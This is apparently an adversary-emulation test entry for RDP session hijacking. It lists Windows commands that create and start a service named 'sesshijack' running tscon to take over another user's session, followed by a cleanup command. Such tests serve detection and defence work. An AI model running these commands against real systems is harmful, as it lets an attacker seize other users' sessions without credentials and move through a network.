#TechniqueName: Remote Service Session Hijacking: RDP Hijacking
#AtomicTestName: RDP hijacking
#Description: [RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization&
#Language: cmd

#commands
query user
sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
net start sesshijack


#cleanup_commands
sc.exe delete sesshijack >nul 2>&1

